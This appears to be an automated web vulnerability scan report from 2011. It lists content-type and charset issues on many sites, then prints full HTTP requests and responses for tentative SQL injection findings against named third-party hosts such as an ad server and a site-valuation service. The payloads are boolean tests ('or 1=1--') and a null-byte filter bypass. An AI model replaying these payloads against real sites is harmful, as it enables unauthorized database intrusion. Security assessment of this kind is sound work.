33.11. http://pixel.invitemedia.com/data_sync

33.12. http://tags.bluekai.com/site/3945

33.13. http://tomopop.com/index-ad-anime.phtml

33.14. http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

33.15. http://www.100grandinstantwin.com/favicon.ico

33.16. http://www.2hairy.com/favicon.ico

33.17. http://www.92kqrs.com/favicon.ico

33.18. http://www.ahima.org/favicon.ico

33.19. http://www.allsup.com/favicon.ico

33.20. http://www.amateurathome.net/favicon.ico

33.21. http://www.argosy.edu/favicon.ico

33.22. http://www.babynameshub.com/favicon.ico

33.23. http://www.benchmade.com/favicon.ico

33.24. http://www.bitstatement.net/favicon.ico

33.25. http://www.blackintrusion.com/favicon.ico

33.26. http://www.clipsguide.com/favicon.ico

33.27. http://www.coolquiz.com/favicon.ico

33.28. http://www.cramster.com/favicon.ico

33.29. http://www.crankyape.com/crankyape_logo.gif

33.30. http://www.cricbuzz.com/favicon.ico

33.31. http://www.cyberhomes.com/favicon.ico

33.32. http://www.dailynewnowa.com/favicon.ico

33.33. http://www.dermnet.com/favicon.ico

33.34. http://www.diskeeper.com/favicon.ico

33.35. http://www.earthfare.com/favicon.ico

33.36. http://www.easyearnsurveys.com/favicon.ico

33.37. http://www.expresstoll.com/favicon.ico

33.38. http://www.female-anatomy.net/favicon.ico

33.39. http://www.flashymodels.com/favicon.ico

33.40. http://www.forrabbits.eu/favicon.ico

33.41. http://www.freegroceriesdirectory.com/favicon.ico

33.42. http://www.giftcertificatedelivery.com/favicon.ico

33.43. http://www.govacuum.com/favicon.ico

33.44. http://www.gpwa.org/favicon.ico

33.45. http://www.hairyfilm.com/favicon.ico

33.46. http://www.hairygirlspussies.com/favicon.ico

33.47. http://www.hsj.org/favicon.ico

33.48. http://www.ibegin.com/weather/weather_widget.php

33.49. http://www.inmates-searches.com/favicon.ico

33.50. http://www.insites.eu/favicon.ico

33.51. http://www.japanator.com/elephant/index_cblogs-mini.phtml

33.52. http://www.japanator.com/elephant/login.phtml

33.53. http://www.japanator.com/elephant/signup.phtml

33.54. http://www.kieronwilliamson.com/favicon.ico

33.55. http://www.laptoptracking.net/favicon.ico

33.56. http://www.laterooms.com/favicon.ico

33.57. http://www.leagle.com/favicon.ico

33.58. http://www.lee.net/favicon.ico

33.59. http://www.mecum.com/favicon.ico

33.60. http://www.myfavoritegames.com/favicon.ico

33.61. http://www.mylearningplan.com/favicon.ico

33.62. http://www.myrtlebeach-resorts.com/favicon.ico

33.63. http://www.nfcc.org/favicon.ico

33.64. http://www.noonetube.com/favicon.ico

33.65. http://www.nylaarp.com/favicon.ico

33.66. http://www.onlinemicrofiche.com/

33.67. http://www.onlinemoneystash.com/favicon.ico

33.68. http://www.oshkosh365.org/favicon.ico

33.69. http://www.phonedelivery4g.com/favicon.ico

33.70. http://www.picindividuals.com/favicon.ico

33.71. http://www.recon.com/favicon.ico

33.72. http://www.redirectgame.com/favicon.ico

33.73. http://www.right-ads.com/favicon.ico

33.74. http://www.righttoworkfoundation.org/favicon.ico

33.75. http://www.ronniesmailorder.com/fiche_select1.asp

33.76. http://www.ronniesmailorder.com/testimonials_display.asp

33.77. http://www.rustoleum.com/favicon.ico

33.78. http://www.snapfinger.com/favicon.ico

33.79. http://www.str8boyzseduced.com/favicon.ico

33.80. http://www.tacklewarehouse.com/favicon.ico

33.81. http://www.techonlife.com/favicon.ico

33.82. http://www.tenniswarehouse.com/favicon.ico

33.83. http://www.termite.com/favicon.ico

33.84. http://www.tube555.com/favicon.ico

33.85. http://www.tubespecials.com/favicon.ico

33.86. http://www.washingtonpost.com/wp-adv/jobs4/html/xd_receiver.htm

33.87. http://www.weddings.com/favicon.ico

33.88. http://www.wheelfire.com/favicon.ico

33.89. http://www.womenolder.net/favicon.ico

33.90. http://www.wtuber.com/favicon.ico

33.91. http://www.wyeke.com/favicon.ico

33.92. http://www.yoplait.com/favicon.ico

34. HTML uses unrecognised charset

34.1. http://www.animeyoung.com/favicon.ico

34.2. http://www.mktginc.com/favicon.ico

34.3. http://www.swoopo.com/favicon.ico

34.4. http://www.washingtonpost.com/wl/jobs/home

35. Content type incorrectly stated

35.1. http://bdv.bidvertiser.com/BidVertiser.dbm

35.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

35.3. http://content.pulse360.com/CC4A2528-2176-11DF-BB34-61FFECADD848

35.4. http://csrc.nist.gov/favicon.ico

35.5. http://j.maxmind.com/app/geoip.js

35.6. http://static.pulse360.com/blob/fb/6e141bc3_social_security_card.jpg

35.7. http://v6test.cdn.att.net/special.jpg

35.8. http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

35.9. http://www.92kqrs.com/favicon.ico

35.10. http://www.ahima.org/favicon.ico

35.11. http://www.allsup.com/favicon.ico

35.12. http://www.babynameshub.com/favicon.ico

35.13. http://www.benchmade.com/favicon.ico

35.14. http://www.calastrology.com/favicon.ico

35.15. http://www.campingsurvival.com/favicon.ico

35.16. http://www.cramster.com/favicon.ico

35.17. http://www.crankyape.com/images/AuctionImages/thumb.26361.1.jpg

35.18. https://www.crankyape.com/images/AuctionImages/thumb.26361.1.jpg

35.19. https://www.crankyape.com/images/AuctionImages/thumb.26361.2.jpg

35.20. https://www.crankyape.com/images/AuctionImages/thumb.26361.3.jpg

35.21. https://www.crankyape.com/images/AuctionImages/thumb.26361.4.jpg

35.22. http://www.cyberhomes.com/favicon.ico

35.23. http://www.dermnet.com/favicon.ico

35.24. http://www.developer.com/favicon.ico

35.25. http://www.diskeeper.com/favicon.ico

35.26. http://www.earthfare.com/favicon.ico

35.27. http://www.fastpictureviewer.com/favicon.ico

35.28. http://www.freegroceriesdirectory.com/favicon.ico

35.29. http://www.goodtoknow.co.uk/favicon.ico

35.30. http://www.google.com/uds/Gfeeds

35.31. http://www.govacuum.com/favicon.ico

35.32. http://www.gpwa.org/favicon.ico

35.33. http://www.greenhulk.net/forums/customavatars/avatar21634_4.gif

35.34. http://www.greenhulk.net/forums/customavatars/avatar27186_2.gif

35.35. http://www.greenhulk.net/forums/customavatars/avatar3537_6.gif

35.36. http://www.greenhulk.net/forums/customavatars/avatar9792_2.gif

35.37. http://www.healthination.com/favicon.ico

35.38. http://www.highcharts.com/highslide/graphics/zoomout.cur

35.39. http://www.hsj.org/favicon.ico

35.40. http://www.ibegin.com/weather/weather_widget.php

35.41. http://www.inmates-searches.com/favicon.ico

35.42. http://www.insites.eu/favicon.ico

35.43. http://www.keds.com/favicon.ico

35.44. http://www.laterooms.com/favicon.ico

35.45. http://www.leagle.com/favicon.ico

35.46. http://www.mecum.com/favicon.ico

35.47. http://www.myfavoritegames.com/favicon.ico

35.48. http://www.newswiretoday.com/favicon.ico

35.49. http://www.nfcc.org/favicon.ico

35.50. http://www.nylaarp.com/favicon.ico

35.51. http://www.picindividuals.com/favicon.ico

35.52. http://www.recon.com/favicon.ico

35.53. http://www.redirectgame.com/favicon.ico

35.54. http://www.ronniesmailorder.com/fiche_select1.asp

35.55. http://www.ronniesmailorder.com/testimonials_display.asp

35.56. http://www.rustoleum.com/favicon.ico

35.57. http://www.seoq.com/favicon.ico

35.58. http://www.seoq.com/webstatshq/images/fav/a/l/b/505403_favicon.ico

35.59. http://www.seoq.com/webstatshq/images/fav/c/h/e/159320_favicon.ico

35.60. http://www.seoq.com/webstatshq/images/fav/def3.ico

35.61. http://www.seoq.com/webstatshq/images/fav/def5.ico

35.62. http://www.seoq.com/webstatshq/images/fav/def6.ico

35.63. http://www.seoq.com/webstatshq/images/fav/e/b/a/22_favicon.ico

35.64. http://www.seoq.com/webstatshq/images/fav/g/o/o/19_favicon.ico

35.65. http://www.seoq.com/webstatshq/images/fav/g/o/o/1_favicon.ico

35.66. http://www.seoq.com/webstatshq/images/fav/r/i/v/647810_favicon.ico

35.67. http://www.seoq.com/webstatshq/images/fav/s/p/e/648999_favicon.ico

35.68. http://www.seoq.com/webstatshq/images/fav/y/a/h/3_favicon.ico

35.69. http://www.snapfinger.com/favicon.ico

35.70. http://www.tacklewarehouse.com/favicon.ico

35.71. http://www.tenniswarehouse.com/favicon.ico

35.72. http://www.termite.com/favicon.ico

35.73. http://www.trafficspaces.net/favicon.ico

35.74. http://www.tubespecials.com/favicon.ico

35.75. http://www.wheelfire.com/favicon.ico

35.76. http://www.wyeke.com/favicon.ico

35.77. http://www.yoplait.com/favicon.ico

36. Content type is not specified

36.1. http://ad.yieldmanager.com/st

36.2. http://ads.bluelithium.com/st

36.3. http://pcm2.map.pulsemgr.com/uds/pc

36.4. http://www.bocajava.com/favicon.ico

36.5. http://www.lavalife.com/favicon.ico

36.6. http://www.ourprayer.org/favicon.ico

36.7. http://www.politicalissuestoday.com/favicon.ico

36.8. http://www.westjet.com/favicon.ico

37. SSL certificate

37.1. https://www.crankyape.com/

37.2. https://www.onlinemicrofiche.com/



1. SQL injection
There are 46 instances of this issue:


1.1. http://ads2.adbrite.com/v0/ad [zs parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /v0/ad?sid=1794248&zs=3330305f323530%00'&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:30 GMT
Content-Length: 0

Request 2

GET /v0/ad?sid=1794248&zs=3330305f323530%00''&ifr=1&ref=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&zx=430&zy=1263&ww=1041&wh=903&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; b="%3A%3A12ggb%2C6e73"; fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr"; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjAKBjc2MjcwMRiN1OvNEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUQAQ; ut="1%3AHc7LDoMgEIXhd5k1CwarJb4NqBXTKRTwEnV892K3f76TnBNWBe0J72HfQuoztNA5p8cozcoYaZw%2FrNiKrHJCxu%2F%2B8p4NI86HiLE6toJ0laggrEU2qjf3zOnMyJJxCVJkGohKtfMW%2BMmNrUTnqJn25uFL7uVCNwYB1ng%2FpOl%2FA67rBw%3D%3D"; vsd=0@3@4dbe115e@websiteprice.net; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3A12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:31 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjYKBjc2MjcwMRDYnbP6CRj42KrOEyIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKFAoGNzgyNjA2EPiAyaMKGPjYqs4TCjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:31 GMT
Set-Cookie: ut="1%3AHY5LEoMgEAXvMmsWDEZDeRtQI1YmEMBPqePdg9l29et6J6wK2hPew76F1GdooXNOj1GalTHSOH9YsRXZqN7cwOnMyJJxCVLEWB1bobpKVDSsRVY5IeN3f3nPZYDzITINRMWy8xb4yY2tROeomfbm4Qvu5UJ3EgRY4%2F2Qpv8NuK4f"; path=/; domain=.adbrite.com; expires=Thu, 29-Apr-2021 02:22:31 GMT
Set-Cookie: vsd=0@4@4dbe1567@websiteprice.net; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 02:22:31 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C84fok%2C1uo0%7Clkigxp%2C83ol2%2C1uo0%7Clkjpss%2C84y2m%2C1uo0%7Clkjqlj%2C826ke%2C1uo0%7Clkjpsr"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 02:22:31 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 02:22:31 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 02:22:31 GMT
Content-Length: 2800

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'fcfaf3';
var AdBrite_Border_Color_Default = 'fcfaf3';
var AdBrite_URL_Col
...[SNIP]...

1.2. http://bizinformation.co/www.onlinemicrofiche.com [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.co
Path:   /www.onlinemicrofiche.com

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15684007'%20or%201%3d1--%20 and 15684007'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /www.onlinemicrofiche.com15684007'%20or%201%3d1--%20 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:12:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 545
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /www.onlinemicrofiche.com15684007' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.co Port 80</address>
</body></html>

Request 2

GET /www.onlinemicrofiche.com15684007'%20or%201%3d2--%20 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:12:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 541
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /www.onlinemicrofiche.com15684007' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.co Port 80</address>
</body></html>

1.3. http://bizinformation.co/www.onlinemicrofiche.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.co
Path:   /www.onlinemicrofiche.com

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 11607392%20or%201%3d1--%20 and 11607392%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /www.onlinemicrofiche.com?111607392%20or%201%3d1--%20=1 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 526
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /www.onlinemicrofiche.com
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.co Port 80</address>
</body></html>

Request 2

GET /www.onlinemicrofiche.com?111607392%20or%201%3d2--%20=1 HTTP/1.1
Host: bizinformation.co
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:11:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14247

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>www.Onlinemicrofiche.com</title><meta name="description" content="Onlinemicrofiche.com has a rank of 126,950 in United States, with an estimated 42,510 monthly visitors. Click to view further details of it's valuation report. Leave a comment or review the website." /><meta property="og:site_name" content="BizInformation"/><meta property="og:title" content="Onlinemicrofiche.com" /><meta property="og:image" content="http://open.thumbshots.org/image.pxf?url=onlinemicrofiche.com" /><link rel="icon" type="image" href="http://bizinformation.com/favicon.ico"/><link href="http://bizinformation.com/css/style_sp110.css" type="text/css" rel="stylesheet" /><script type="text/javascript" src="http://bizinformation.com/css/jquery.idTabs.min.js"></script></head><body><div class="main_wrapper"><div class="main_header"><div class="header_logo"><a href="/"><img src="http://bizinformation.com/images/logo.gif" /></a></div><div class="search_div_main"><div class="input_div"><form method="post" action="/" id="check"><input type="hidden" name="action" value="fetch_statistics" /><input type="text" name="url" id="url" value="www." class="url" /></div><input class="submit" type="submit" value="Value"/></form></div><div class="header_right_part"><div class="follow_us_on"><div class="follows_clickable_image"><img border="0" src="http://bizinformation.com/images/twitter-facebook.gif" /></div></div></div></div><div class="page_middle_part_border"><div class="page_middle_part"><div class="page_left
...[SNIP]...

1.4. http://bizinformation.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 96146940'%20or%201%3d1--%20 and 96146940'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico96146940'%20or%201%3d1--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:16:41 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico96146940' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico96146940'%20or%201%3d2--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:16:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 529
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico96146940' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

